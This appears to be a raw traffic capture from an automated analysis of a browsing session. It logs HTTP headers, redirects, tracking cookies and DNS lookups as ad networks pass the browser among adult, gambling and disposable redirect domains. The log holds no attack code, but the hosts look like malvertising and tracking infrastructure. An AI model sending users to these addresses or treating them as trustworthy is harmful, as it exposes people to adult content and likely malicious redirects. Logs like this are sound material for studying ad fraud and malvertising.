Set-Cookie: __uvt=a%3A1%3A%7Bi%3A0%3Bs%3A33%3A%226135e538f19b57.766097531896998388%22%3B%7D; expires=Wed, 06 Sep 2023 09:55:13 GMT; path=; domain=.optnx.com;
Set-Cookie: impressions=x%9C%ABV2157000%D35%B5%B04%B4404Q%B2%8A6%D41436%B042244%D6172%88%AD%05%00%A6%D6%08%85; expires=Mon, 06 Sep 2021 21:55:13 GMT; path=/; domain=.optnx.com;
Set-Cookie: c-tag=%7B%22tag-link%22%3A%22v3%7C%7CUSA%7C3576411%7C58919014%7C0%7C%7C508%7C41%7C2%7C15%7C0%7C0%7C0%7C588%7C0%7C0%7C0%7C1%7C0%7C0%7C0%7C0%7C1%7C0%7C0%7C0%7C6135e538f19b57.766097531896998388%7C8c4d601376bd6f463d0ffdfa8b079fe9%7C931653%7Cjavsex.us%7C1366x768%7C%7C0%7C0%7C0%7C44%7C0%7C0%7C0%7C0%7C0%7Cok%22%7D; expires=Tue, 07 Sep 2021 09:55:13 GMT; path=/; domain=.optnx.com;
Location: https://furricity-nursubaru.xyz/95999da2-6e21-49b2-959c-1cc698b66db5?zoneid=3576411&source=ad-maven.com&varid=58919014&keyword=&tags=javsex,us,index,htm&siteid=816261&campid=4570006&catid=508&country=USA&format=&cost=0.0005&tag=oodNVTHXNHZNHVM45c3UVWV0zTOqtumulmpdK51UtrqZnTumqdK6V0rqrbXSuldK6Z0rpXSuldM6V0rpXWWy3XVXW0y6V0T002253W7caca7W63W7ut1p2rlmosr02r4pro2l4424zt0lsu43uddRNXVQ7zNBd1RnK5zpXSuldTS6V0rpXSulcH2&exffir=eyJjIjoiZjgwZDI3NTVjMWZjZTE1NTI3OTJlZDZjMWQ1NDNlZmQiLCJ0IjoiMSIsInNyIjoiMTM2Nng3NjgiLCJjciI6Ijc5OXg1MzciLCJpIjoiMCJ9
-
GEThttp://alfad.pro/go/266933/627597RequestGET /go/266933/627597 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:55:14 GMT
Server: nginx
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive
-
GEThttp://dryteen.us/index.htmRequestGET /index.htm HTTP/1.1
Host: dryteen.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:14 GMT
Content-Type: text/html
Content-Length: 292
Last-Modified: Thu, 13 May 2021 09:17:18 GMT
Connection: keep-alive
ETag: "609cee9e-124"
Accept-Ranges: bytes
-
GEThttp://alfad.pro/go/266933/627596RequestGET /go/266933/627596 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:55:14 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
GEThttp://jpteen.us/index.htmRequestGET /index.htm HTTP/1.1
Host: jpteen.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:29.0) Gecko/20100101 Firefox/29.0 /29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:14 GMT
Content-Type: text/html
Content-Length: 130
Last-Modified: Mon, 05 Jul 2021 06:26:45 GMT
Connection: keep-alive
ETag: "60e2a625-82"
Accept-Ranges: bytes
-
GEThttp://pennews.us/index.htmRequestGET /index.htm HTTP/1.1
Host: pennews.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:14 GMT
Content-Type: text/html
Content-Length: 101
Last-Modified: Tue, 24 Aug 2021 09:20:21 GMT
Connection: keep-alive
ETag: "6124b9d5-65"
Accept-Ranges: bytes
-
GEThttp://xxxmom.ru/ad.phpRequestGET /ad.php HTTP/1.1
Host: xxxmom.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://web5.xxxoxx.com/web5.phpRequestGET /web5.php HTTP/1.1
Host: web5.xxxoxx.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://onsanothi.biz/redirect?tid=929274RequestGET /redirect?tid=929274 HTTP/1.1
Host: onsanothi.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SM-T550 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xnude.us/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Date: Mon, 06 Sep 2021 09:55:14 GMT
Server: openresty/1.17.8.2
cache-control: no-store, no-cache, must-revalidate, no-transform
Pragma: no-cache
P3P: CP="NID DSP ALL COR"
set-cookie: csu=ae1c84f6-2164-4a91-b9ac-d3bf111344d1
Location: http://s.optnx.com/cimp.php?data=TVRZek1Ea3lNakV4Tkh4aVltSmpZV0pqWVRWbE9XUm1ZMk0xTmpGaE0yRTBOMk5oWlRnek5UWmxOQS0tfGh0dHBzOi8vY2Ftc29kYTEuY29tL3JlZGlyLz9pZD1leG9yZW1zb2RhbW9iaXBvcHVzfGh0dHB8MTU0LjYxLjcxLjUxfFVTQXw0MXxhZC1tYXZlbi5jb218NTczMjU0fDQzMDY3NXw4MTYyNjF8MzU3NjQxMXw1MDh8MjU4NTc4OXw0MzM1ODU0MnwxMXwyfDU3fDB8NTg4fDkyOTI3NHw5MHw3NXxVU0R8VVNEfDF8MXwyMnx8MXxVU0F8fDE2fDJ8MHx8YmEwNzdiMGM2OTVhODYwODQ2ZjdhMzQ4NTM3ZWY4NGV8ODg3MTljNmE1YmE4OTI1MmUxMDBlOWE0NDQ3YWEwNzd8MXwwfHhudWRlLnVzfDB8MHwwfDAuMTR8MXwwfGV4Y2hhbmdlX2xpbmt8MHwwfDB8LTF8MHwwfHx8MXwxNDQwfHwwfDB8MHw0NXwwfDB8MXwwfE9LfDcyYTg5NjRhYjc4YTY5YzFjMTIwOWQ1YTNiZGNiNjBl
X-Cache: Miss from cloudfront
Via: 1.1 559401aa49f4b835c1816ad004278e3e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS50-C1
X-Amz-Cf-Id: SWhNVyaNulm_83rb9lQ3GtbqlyE7Co08xSyJNkeAkSsawhgQgPQaxg==
-
DNSc.amazon-adsystem.comRequestc.amazon-adsystem.comIN AResponsec.amazon-adsystem.comIN CNAMEd1ykf07e75w7ss.cloudfront.netd1ykf07e75w7ss.cloudfront.netIN A52.222.142.111
-
DNSpixel.33across.comRequestpixel.33across.comIN AResponsepixel.33across.comIN A208.100.17.176
-
DNSonetag-sys.comRequestonetag-sys.comIN AResponseonetag-sys.comIN A51.38.120.206onetag-sys.comIN A51.89.9.254onetag-sys.comIN A51.89.9.251onetag-sys.comIN A51.89.9.252onetag-sys.comIN A51.89.9.253
-
DNSap.lijit.comRequestap.lijit.comIN AResponseap.lijit.comIN CNAMEvap.lijit.comvap.lijit.comIN CNAMEemeas.vap.lijit.comemeas.vap.lijit.comIN CNAMEoeu.vap.lijit.comoeu.vap.lijit.comIN A72.251.249.13oeu.vap.lijit.comIN A72.251.249.14oeu.vap.lijit.comIN A216.52.2.39oeu.vap.lijit.comIN A216.52.2.48oeu.vap.lijit.comIN A216.52.2.19oeu.vap.lijit.comIN A72.251.249.9oeu.vap.lijit.comIN A216.52.2.30
-
DNSads.servenobid.comRequestads.servenobid.comIN AResponseads.servenobid.comIN A34.200.74.74ads.servenobid.comIN A52.44.47.222ads.servenobid.comIN A34.226.8.89ads.servenobid.comIN A52.201.109.125ads.servenobid.comIN A3.228.239.71ads.servenobid.comIN A107.22.113.164ads.servenobid.comIN A18.210.36.232ads.servenobid.comIN A44.193.54.51
-
DNScdn.districtm.ioRequestcdn.districtm.ioIN AResponsecdn.districtm.ioIN A104.16.68.69cdn.districtm.ioIN A104.16.190.66
-
DNSsecure-assets.rubiconproject.comRequestsecure-assets.rubiconproject.comIN AResponsesecure-assets.rubiconproject.comIN CNAMEdigicertwc.rubiconproject.com.edgekey.netdigicertwc.rubiconproject.com.edgekey.netIN CNAMEe8960.e2.akamaiedge.nete8960.e2.akamaiedge.netIN A23.34.190.24
-
DNSpixel.33across.comRequestpixel.33across.comIN AResponsepixel.33across.comIN A208.100.17.177
-
DNSg2.gumgum.comRequestg2.gumgum.comIN AResponseg2.gumgum.comIN A50.17.150.117g2.gumgum.comIN A54.80.64.222g2.gumgum.comIN A52.7.140.147g2.gumgum.comIN A23.21.31.76g2.gumgum.comIN A34.206.37.204g2.gumgum.comIN A3.213.247.11g2.gumgum.comIN A54.146.57.23g2.gumgum.comIN A107.20.231.62
-
DNSssum-sec.casalemedia.comRequestssum-sec.casalemedia.comIN AResponsessum-sec.casalemedia.comIN CNAMEssum-sec.casalemedia.com.edgekey.netssum-sec.casalemedia.com.edgekey.netIN CNAMEe8037.g.akamaiedge.nete8037.g.akamaiedge.netIN A2.18.99.184
-
DNSssbsync.smartadserver.comRequestssbsync.smartadserver.comIN AResponsessbsync.smartadserver.comIN CNAMEssbsync-geo.smartadserver.comssbsync-geo.smartadserver.comIN CNAMEusersync-geo-global.usersync-prod-sas.akadns.netusersync-geo-global.usersync-prod-sas.akadns.netIN CNAMEssbsync-itx5.smartadserver.comssbsync-itx5.smartadserver.comIN A185.86.138.132ssbsync-itx5.smartadserver.comIN A185.86.138.120ssbsync-itx5.smartadserver.comIN A185.86.138.131ssbsync-itx5.smartadserver.comIN A185.86.138.119
-
DNStoken.rubiconproject.comRequesttoken.rubiconproject.comIN AResponsetoken.rubiconproject.comIN CNAMEpixel.rubiconproject.net.akadns.netpixel.rubiconproject.net.akadns.netIN A213.19.162.80pixel.rubiconproject.net.akadns.netIN A213.19.162.90
-
DNSuat-net.technoratimedia.comRequestuat-net.technoratimedia.comIN AResponseuat-net.technoratimedia.comIN CNAMEadserver.technoratimedia.comadserver.technoratimedia.comIN CNAMEv04.cap-ash1.technoratimedia.comv04.cap-ash1.technoratimedia.comIN A150.136.156.92
-
DNSde.tynt.comRequestde.tynt.comIN AResponsede.tynt.comIN A208.100.17.184
-
DNSib.adnxs.comRequestib.adnxs.comIN AResponseib.adnxs.comIN CNAMEg.geogslb.comg.geogslb.comIN CNAMEib.anycast.adnxs.comib.anycast.adnxs.comIN A185.33.221.14ib.anycast.adnxs.comIN A185.33.220.244ib.anycast.adnxs.comIN A185.33.221.11ib.anycast.adnxs.comIN A185.33.221.87ib.anycast.adnxs.comIN A185.33.223.178ib.anycast.adnxs.comIN A185.33.221.53ib.anycast.adnxs.comIN A185.33.220.100ib.anycast.adnxs.comIN A185.33.220.145
-
DNSus-u.openx.netRequestus-u.openx.netIN AResponseus-u.openx.netIN A35.244.159.8us-u.openx.netIN A34.98.64.218
-
DNSsecurepubads.g.doubleclick.netRequestsecurepubads.g.doubleclick.netIN AResponsesecurepubads.g.doubleclick.netIN CNAMEpartnerad.l.doubleclick.netpartnerad.l.doubleclick.netIN A216.58.208.98
-
DNSmillustry.topRequestmillustry.topIN AResponsemillustry.topIN A13.227.222.89millustry.topIN A13.227.222.73millustry.topIN A13.227.222.110millustry.topIN A13.227.222.102
-
DNSpornlist.vipRequestpornlist.vipIN AResponsepornlist.vipIN A178.238.238.213
-
DNSwww.onlinehollandcasino.netRequestwww.onlinehollandcasino.netIN AResponsewww.onlinehollandcasino.netIN CNAMEonlinehollandcasino.netonlinehollandcasino.netIN A149.210.209.90
-
DNSyesww.ruRequestyesww.ruIN AResponseyesww.ruIN A212.107.18.203
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSelevisions.bizRequestelevisions.bizIN AResponseelevisions.bizIN A65.9.73.41elevisions.bizIN A65.9.73.21elevisions.bizIN A65.9.73.56elevisions.bizIN A65.9.73.69
-
DNSjpav.usRequestjpav.usIN AResponsejpav.usIN A167.86.121.34
-
DNSyesdd.liveRequestyesdd.liveIN AResponseyesdd.liveIN A212.107.18.203
-
DNSfreejav.ruRequestfreejav.ruIN AResponsefreejav.ruIN A167.86.103.60
-
DNS789ff.infoRequest789ff.infoIN AResponse789ff.infoIN A5.181.218.143
-
DNSyesde.xyzRequestyesde.xyzIN AResponseyesde.xyzIN A212.107.18.203
-
DNSnkwintenc.bizRequestnkwintenc.bizIN AResponsenkwintenc.bizIN A52.222.139.58nkwintenc.bizIN A52.222.139.51nkwintenc.bizIN A52.222.139.113nkwintenc.bizIN A52.222.139.45
-
GEThttp://alfad.pro/ad/ad?p=266933&w=627004&t=34f9715fc3b76a17&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=627004&t=34f9715fc3b76a17&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/627004
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
GEThttp://s.optnx.com/cimp.php?data=TVRZek1Ea3lNakEyTTN3eE9HRmtPVGxoTnpkbE9EUm1ZV0kyTlRrNU5qRmlPR0ZoWWpFNE1qTXlOZy0tfGh0dHBzOi8vY2Ftc29kYTEuY29tL3JlZGlyLz9pZD1leG9yZW1zb2RhbW9iaXBvcHVzfGh0dHB8MTU0LjYxLjcxLjUxfFVTQXw0MXxhZC1tYXZlbi5jb218NTczMjU0fDQzMDY3NXw4MTYyNjF8MzU3NjQxMXw1MDh8MjU4NTc4OXw0MzM1ODU0MnwxMXwxMDB8NDR8MHw1ODh8OTIyNzAzfDkwfDc1fFVTRHxVU0R8MXwxfDIyfHwxfFVTQXx8MTZ8MnwwfHw1MWNjYjYzN2NkMDM4ZDMwMmViOTljODMyMTg1ZjY2M3xhOWM2OGQzMmY1MWIxN2ZjOTIzMmViYzIzODNjNDdmZnwxfDB8bW9tYXYudXN8MHwwfDB8MC4xMnwxfDB8ZXhjaGFuZ2VfbGlua3wwfDB8MHwtMXwwfDB8fHwxfDE0NDB8fDB8MHwwfDB8MHwwfDF8MHxPS3w4NWYwNDgzNjFlMDU1NDhjMGQ1NTI5OWRjMTMxODM1YQ--RequestGET /cimp.php?data=TVRZek1Ea3lNakEyTTN3eE9HRmtPVGxoTnpkbE9EUm1ZV0kyTlRrNU5qRmlPR0ZoWWpFNE1qTXlOZy0tfGh0dHBzOi8vY2Ftc29kYTEuY29tL3JlZGlyLz9pZD1leG9yZW1zb2RhbW9iaXBvcHVzfGh0dHB8MTU0LjYxLjcxLjUxfFVTQXw0MXxhZC1tYXZlbi5jb218NTczMjU0fDQzMDY3NXw4MTYyNjF8MzU3NjQxMXw1MDh8MjU4NTc4OXw0MzM1ODU0MnwxMXwxMDB8NDR8MHw1ODh8OTIyNzAzfDkwfDc1fFVTRHxVU0R8MXwxfDIyfHwxfFVTQXx8MTZ8MnwwfHw1MWNjYjYzN2NkMDM4ZDMwMmViOTljODMyMTg1ZjY2M3xhOWM2OGQzMmY1MWIxN2ZjOTIzMmViYzIzODNjNDdmZnwxfDB8bW9tYXYudXN8MHwwfDB8MC4xMnwxfDB8ZXhjaGFuZ2VfbGlua3wwfDB8MHwtMXwwfDB8fHwxfDE0NDB8fDB8MHwwfDB8MHwwfDF8MHxPS3w4NWYwNDgzNjFlMDU1NDhjMGQ1NTI5OWRjMTMxODM1YQ-- HTTP/1.1
Host: s.optnx.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; LLD-L31 Build/HONORLLD-L31; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36 GSA/9.61.9.21.arm64
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://momav.us/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __uvt=a%3A1%3A%7Bi%3A0%3Bs%3A32%3A%226135e587f31f88.93457945333083139%22%3B%7D; expires=Wed, 06 Sep 2023 09:55:19 GMT; path=; domain=.optnx.com;
Content-Encoding: gzip
-
GEThttp://pornlist.vip/index.htmRequestGET /index.htm HTTP/1.1
Host: pornlist.vip
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.68
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:20 GMT
Content-Type: text/html
Content-Length: 301
Last-Modified: Mon, 12 Jul 2021 03:45:07 GMT
Connection: keep-alive
ETag: "60ebbac3-12d"
Accept-Ranges: bytes
-
GEThttp://jpav.us/index.htmRequestGET /index.htm HTTP/1.1
Host: jpav.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) GSA/6.0.51363 Mobile/11D257 Safari/9537.53
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:20 GMT
Content-Type: text/html
Content-Length: 213
Last-Modified: Thu, 26 Aug 2021 08:30:11 GMT
Connection: keep-alive
ETag: "61275113-d5"
Accept-Ranges: bytes
-
GEThttp://millustry.top/redirect?tid=936782RequestGET /redirect?tid=936782 HTTP/1.1
Host: millustry.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xmom.us/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
GEThttp://nmanateex.top/redirect?tid=915996RequestGET /redirect?tid=915996 HTTP/1.1
Host: nmanateex.top
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.22 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://momass.xyz/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:55:20 GMT
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
cache-control: no-store, no-cache, must-revalidate, no-transform
pragma: no-cache
p3p: CP="NID DSP ALL COR"
set-cookie: csu=76f950c9-9f3e-404e-9c75-5ec7adba8f69
location: https://xml.bid-engine.com/click?i=zXupA-3aO1s_0
x-cache: Miss from cloudfront
via: 1.1 4fa61644a4cc2dfcb32e66f7e29f0077.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS54-C1
x-amz-cf-id: eCAO8eoGbWgPt585zSm18JIfcl6DNrEtnzXo3DZuzlje7ISZGOF2kA==
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BbRNTHiVCdXh6EYP9f1lx4y4Gk75e%2BCD8Ww56JvBjEs3nGq5jsJDx9Je%2Fmh9G%2Bi1xIiRzc4Jxcn29JpqVEAxQjMjxjvRRnvEBSo3CvNdquDbl0%2B1FEo9SePogreB%2BoQF"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68a6d2320ff9fa9c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
-
GEThttp://elevisions.biz/redirect?tid=934051RequestGET /redirect?tid=934051 HTTP/1.1
Host: elevisions.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://txxx.uk/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
DNSsync.1rx.ioRequestsync.1rx.ioIN AResponsesync.1rx.ioIN A199.127.204.142
-
GEThttp://freejav.ru/adv.phpRequestGET /adv.php HTTP/1.1
Host: freejav.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:55:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSde.tynt.comRequestde.tynt.comIN AResponsede.tynt.comIN A67.202.105.31
-
DNSpixel.quantserve.comRequestpixel.quantserve.comIN AResponsepixel.quantserve.comIN CNAMEpx2.px.quantserve.compx2.px.quantserve.comIN A192.184.69.193px2.px.quantserve.comIN A192.184.69.152px2.px.quantserve.comIN A192.184.69.231px2.px.quantserve.comIN A192.184.69.149px2.px.quantserve.comIN A192.184.69.139px2.px.quantserve.comIN A192.184.69.141px2.px.quantserve.comIN A192.184.69.146px2.px.quantserve.comIN A192.184.69.143
-
DNSsync.mathtag.comRequestsync.mathtag.comIN AResponsesync.mathtag.comIN CNAMEpixel-origin.mathtag.compixel-origin.mathtag.comIN A185.29.132.241pixel-origin.mathtag.comIN A185.29.134.244pixel-origin.mathtag.comIN A185.29.132.245pixel-origin.mathtag.comIN A185.29.134.248
-
DNSjadserve.postrelease.comRequestjadserve.postrelease.comIN AResponsejadserve.postrelease.comIN CNAMEjadserve.postrelease.com.akadns.netjadserve.postrelease.com.akadns.netIN A54.146.124.230jadserve.postrelease.com.akadns.netIN A18.214.172.53jadserve.postrelease.com.akadns.netIN A3.217.216.1jadserve.postrelease.com.akadns.netIN A34.200.155.146jadserve.postrelease.com.akadns.netIN A75.101.244.20jadserve.postrelease.com.akadns.netIN A35.153.224.87jadserve.postrelease.com.akadns.netIN A18.213.12.146jadserve.postrelease.com.akadns.netIN A18.209.200.15
-
DNSde.tynt.comRequestde.tynt.comIN AResponsede.tynt.comIN A208.100.17.185
-
DNSaax-eu.amazon-adsystem.comRequestaax-eu.amazon-adsystem.comIN AResponseaax-eu.amazon-adsystem.comIN A52.95.123.167
-
DNSupdate.googleapis.comRequestupdate.googleapis.comIN AResponseupdate.googleapis.comIN A142.250.179.195
-
DNSyesdd.liveRequestyesdd.liveIN AResponseyesdd.liveIN A212.107.18.203
-
DNSnakedwife.xyzRequestnakedwife.xyzIN AResponsenakedwife.xyzIN A194.59.164.58
-
DNSdiabasewoodhouse.xyzRequestdiabasewoodhouse.xyzIN AResponsediabasewoodhouse.xyzIN A34.196.13.28
-
DNSelevisions.bizRequestelevisions.bizIN AResponseelevisions.bizIN A65.9.73.69elevisions.bizIN A65.9.73.21elevisions.bizIN A65.9.73.56elevisions.bizIN A65.9.73.41
-
DNSmomass.xyzRequestmomass.xyzIN AResponsemomass.xyzIN A178.238.238.213
-
DNSlangke.fr.amRequestlangke.fr.amIN AResponselangke.fr.amIN A212.107.18.203
-
DNSqihuu.netRequestqihuu.netIN AResponseqihuu.netIN A5.181.218.143
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNShornytit.usRequesthornytit.usIN AResponsehornytit.usIN A207.180.237.38
-
GEThttp://diabasewoodhouse.xyz/?k=bdb63baf3121b8ffdc2be3c53ab79a9b.1630922063.111.2.1.Z3JhZGlub25lYXRob3VzZS54eXo%3D&r=&z=-480RequestGET /?k=bdb63baf3121b8ffdc2be3c53ab79a9b.1630922063.111.2.1.Z3JhZGlub25lYXRob3VzZS54eXo%3D&r=&z=-480 HTTP/1.1
Host: diabasewoodhouse.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0 IceDragon/58.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Server: nginx
Date: Mon, 06 Sep 2021 09:55:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: tpp_u=0%3B1631008526; expires=Wed, 08-Sep-2021 09:55:26 GMT; path=/
Set-Cookie: tpp_6561762_l=1197%3B1631008526; expires=Wed, 08-Sep-2021 09:55:26 GMT; path=/
Set-Cookie: tpp_ov=102611%3B1631008526; expires=Wed, 08-Sep-2021 09:55:26 GMT; path=/
Set-Cookie: tpp_ov=102611%2C102652%3B1631008526; expires=Wed, 08-Sep-2021 09:55:26 GMT; path=/
Set-Cookie: tpp_ov=102611%2C102652%2C103109%3B1631008526; expires=Wed, 08-Sep-2021 09:55:26 GMT; path=/
Expires: Mon, 31 Dec 2001 23:59:59 GMT
Pragma: no-cache
